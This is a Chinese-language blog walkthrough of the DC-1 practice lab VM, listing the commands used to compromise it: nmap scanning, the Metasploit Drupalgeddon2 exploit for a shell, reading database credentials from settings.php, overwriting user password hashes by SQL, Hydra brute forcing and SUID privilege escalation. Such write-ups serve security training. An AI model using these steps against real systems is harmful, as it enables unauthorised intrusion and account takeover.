首页 > 其他分享 >DC-1靶机

DC-1靶机

时间:2024-08-05 16:18:34浏览次数:9  
标签:加密 show 数据库 DC 密码 靶机 我们

靶机下载

下载后直接用vmware打开即可

然后把靶机网络连接模式改为net,然后把攻击机也就是kail改为桥连或是net

然后打开靶机停留在下面这个状态

image

接下来你就可以开始渗透了

第一步:找到靶机
先扫一下网段(网段ifconfig看一下)
nmap -sV 10.204.11.0/24

image

找到应该10.204.11.0是靶机地址

其开启了80端口 HTTP 超文本传输服务

一般特殊端口有其对应的服务
详情看这里

然后我们先查看一下其80端口
用wappalyzer看一下

Wappalyzer是一款开源的浏览器扩展,用于识别网站所使用的技术栈。它能够检测出使用的Web服务器、内容管理系统、编程语言、JavaScript库、框架等信息,并将其展示给用户。

image

我们看到是
Drupal7
接下来使用Metasploit(MSF)

msfconsole
//进入工具

image

search drupal
//搜索与Drupal相关的漏洞模块

image

这里选择利用危险系数高并且年份比较新的漏洞

use exploit/unix/webapp/drupal_drupalgeddon2

然后查看模块参数

show options

image

yes的是我们必须要设置的参数

设置靶机ip
set RHOSTS 10.204.11.0

image

然后直接开始攻击run,拿到shell
image

image

实现交互

python -c 'import pty; pty.spawn("/bin/bash")'

image

image

暗示我们配置文件有东西

我们去查一下配置文件
不确定路径但是确定文件名settings.php
我们直接利用``

cat `find / -name settings.php`

image

flag2给了一个数据库和一个用户密码

我们去数据库寻找一下有用信息

mysql -udbuser -pR0ck3t
show databases;
use drupaldb;show tables;
select * from users;

image

找到了两个用户

但是密码很明显被加密了我们肯定是无法直接登录

但是我们可以操作数据库
我们可以用框架的密码加密脚本对123456进行加密再用加密结果替代数据库中的加密密码
我们便实现了密码的更改
方法来源

image

修改数据库

use drupaldb;update users set pass = "$S$D1UQvb3x7lKoCSX6S9K.r.wB202Lsa/r7fkOj7CelJsSEMFDJjGv" where name = 'admin' or name = 'Fred';

image

接下来我们便能登录

并且顺利查询到flag3

image

给我们提到了/etc/passwd和/etc/shadow
先查看一下/etc/passwd
image

发现flag4用户
没有密码
直接爆破
使用Hydra(kali自带)

具体使用方法
image

image

然后我们便可以去登陆了

image

很明显然我们提权

Linux suid提权
详细

image
image

通关

标签:加密,show,数据库,DC,密码,靶机,我们
From: https://www.cnblogs.com/dghh/p/18341157

相关文章

  • 词云图大师(WordCloudMaster)上线Web端!
    我们非常激动地宣布,词云图大师(WordCloudMaster)现已正式上线Web端!这一全新版本为用户带来了更多的便捷和功能,让创建和分享词云变得更加轻松。无论是企业、教育机构还是个人用户,都可以通过Web端实现快速生成和定制属于自己的词云图。https://studio.wordcloudmaster.com/无缝体验......
  • pytorch学习笔记5 tensor 广播broadcasting
    不同shape直接加减,系统会自动做broadcasting操作先右对齐(小维度对齐)比如:Featuremaps:[4,32,14,14]Bias:[32,1,1]=>][1,32,1,1]=>[4,32,14,14]做到与Featuremaps的shape相同,才能进行相加广播扩展的时候只是做这样的操作,并不实质拷贝数据,以节省内存空间可广播的条件......
  • AMI-1 是一种有效的、具有细胞渗透性和可逆性的蛋白精氨酸 N-甲基转移酶 (PRMT) 抑制
    CAS:20324-87-2品牌:MedChemExpress(MCE)存储条件:4°C,sealedstorage,awayfrommoisture生物活性:AMI-1是一种有效的、具有细胞渗透性和可逆性的蛋白精氨酸N-甲基转移酶(PRMT) 抑制剂,IC50 为8.8人PRMT1和酵母Hmt1p分别为μM和3.0μM。AMI-1通过阻断肽-底......
  • Minoxidil (U10858) 是一种ATP 敏感性钾 (KATP) 通道开启剂 |MedChemExpress (MCE)
    中文名:米诺地尔CAS:38304-91-5品牌:MedChemExpress(MCE)存储条件:Powder:-20°C,3years;4°C,2years.Insolvent:-80°C,6months;-20°C,1month.生物活性:Minoxidil(U10858)是一种ATP敏感性钾(KATP)通道 开启剂,是一种有效的口服降压药和外周血管扩张剂,可促......
  • FPGA设计之跨时钟域(CDC)设计篇(5)----同步FIFO的两种设计方法(计数器法/高位扩展法 | 手撕
    1、什么是FIFO?        FIFO(FirstInFirstOut)是一种先进先出的数据缓存器,在逻辑设计里面用的非常多。它是一种存储器结构,被广泛应用于芯片设计中。FIFO由存储单元队列或阵列构成,第一个被写入队列的数据也是第一个从队列中读出的数据。        FIFO设计可......
  • (峰绍)FU6831/11/18 QFN-48/LQFP 单片机嵌入式和可配置的三相BLDC/PMSM电机控制器场定向
    产品描述FU6831/11/18系列是一款集成电机控制引擎(ME)和8051内核的电机驱动专用芯片。ME集成FOC、MDU、LPF、PI、SVPWM/SPWM等诸多硬件模块,可硬件自动完成电机FOC/BLDC运算控制;8051内核用于参数配置和日常事务处理,双核并行工作实现各种高性......
  • STM32H7 HAL库CubeMX 双重ADC模式同步采样详细配置+FFT计算相位差
    前言在电赛备赛期间琢磨了一下ADC同步采样的实现方式,本来是打算直接用AD7606来着,但是搞了半天也没把驱动整出来...考虑到AD7606本身采样率也拉不到太高,于是就花了几天时间把片上ADC配出来了。查资料的时候我发现关于STM32双重ADC模式的资料是真的少,用FFT算两路信号相位差的实例代......
  • 使用Adobe Acrobat Pro DC 把彩色PDF图像改为黑白PDF,且不改变原图像尺寸。
    一、背景:1.编辑要求你在投稿时确定:Informationaboutcolorfiguresasbeingintendedforprintedcolorreproductionortobeprintedinblack-and-white.2.你的图像是彩色的PDF,而且图像的尺寸与A4纸大小不一致.二、解决办法:1. 把你的彩色PDF通过虚拟打印......
  • ADC静态误差
    0前言图1表示测量数据精密度高,但准确度较差;图2 表示测量数据的准确度高,但精密度差;图3表示测量数据精密度和准确度都好,即精确度高。 1简介    模数转换器(ADC)广泛用于各种应用中,尤其是需要处理模拟传感器信号的测量系统,比如测量压力、流量、速度和温度。 ......
  • SDN(Software-Defined Networking,软件定义网络),NFV(Network Functions Virtualization,网
    目录SDN(Software-DefinedNetworking,软件定义网络)NFV(NetworkFunctionsVirtualization,网络功能虚拟化)SDN(软件定义网络)NFV(网络功能虚拟化)SDN的优势NFV的优势DC(数据中心)网关与MEC(移动边缘计算)节点DC网关MEC节点DC网关与MEC节点的协同作用SDN(Software-DefinedNet......